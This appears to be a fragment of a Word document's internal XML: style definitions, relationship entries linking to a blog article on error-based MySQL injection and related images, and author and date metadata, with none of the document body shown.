  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-cn">
    <w:name w:val="crayon-cn"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="004652F3"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-i">
    <w:name w:val="crayon-i"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="004652F3"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-st">
    <w:name w:val="crayon-st"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="0046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3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4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7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65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45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82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27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44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1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3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8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5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1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93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56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9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0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0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5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1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1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0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4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4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4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7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83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4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3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9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4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2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55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4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2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3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2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35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43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2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8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8386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9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1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1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1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6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8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23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7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88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8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5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06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6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8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5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45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4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4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5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9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8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8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7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8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53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0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9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9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1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9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7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0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5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5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0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1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0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5235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8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4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4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5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5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1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88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8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9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8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2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4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6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2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8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0245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4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9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34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4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14" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.lijiejie.com/wp-content/uploads/2014/09/mysql_error_1.png" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX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hyperlink" Target="http://lib.csdn.net/base/14" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.lijiejie.com/author/lijiejie/" TargetMode="External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jiejie.com/mysql-injection-error-based-duplicate-entry/" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX5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10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png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1357</Words>
  <Characters>7737</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>64</Lines>
  <Paragraphs>18</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>Microsoft</Company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李文致</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>李文致</cp:lastModifiedBy>
  <cp:revision>9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-05-16T10:54:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-05-17T08:04:00Z</dcterms:modified>
</cp:coreProperties>
</file>